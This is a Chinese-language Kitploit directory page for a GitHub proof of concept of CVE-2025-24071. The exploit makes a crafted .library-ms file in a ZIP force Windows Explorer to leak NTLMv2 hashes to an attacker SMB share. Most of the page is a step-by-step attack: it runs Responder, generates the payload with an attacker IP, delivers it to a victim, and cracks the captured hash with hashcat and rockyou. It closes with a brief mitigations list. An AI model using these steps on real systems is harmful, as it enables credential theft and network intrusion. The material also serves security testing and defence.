Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24071-POC-NTLMHashDisclosure- — CVE-2025-24071:通过 .library-ms 文件泄露 NTLMv2 哈希 | Kitploit
工具/GitHubGitHub/deshanfer94/cve-2025-24071-poc-ntlmhashdisclosure-
密码破解侦察漏洞分析漏洞利用信息收集红队
GitHubdeshanfer94/cve-2025-24071-poc-ntlmhashdisclosure-

CVE-2025-24071-POC-NTLMHashDisclosure-

CVE-2025-24071:通过 .library-ms 文件泄露 NTLMv2 哈希

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
151年前尚未审核

CVE-2025-24071-POC-NTLM哈希泄露

  • 触发自动SMB认证到攻击者控制的共享。
  • 无需交互——Windows资源管理器自动发起此NTLM认证。
  • 导致NTLMv2哈希泄露(信息泄露)。
  • 影响Windows 10/11所有版本,尤其是11 23H2。

设置攻击者环境

sudo apt update && sudo apt install responder -y

启动Responder

sudo responder -I eth0

运行漏洞利用脚本

安装所需Python模块

pip install colorama python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep

这将生成: testpayload.library-ms testpayload.zip

在受害者机器上测试

将testpayload.zip传输到Windows 11测试机。 使用Windows资源管理器解压ZIP文件。 这将触发Windows尝试访问SMB路径,从而泄露NTLM哈希。

捕获哈希

responder -I eth0

Image

准备哈希文件

创建hash.txt文件

victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3

选择字典

最常用的rockyou.txt

运行Hashcat

hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt

Image

缓解措施

  • 在防火墙阻止出站SMB(TCP 445)。
  • 禁用对不受信任SMB共享的自动认证(组策略)。
  • 监控.library-ms文件解压和SMB连接。
下载工具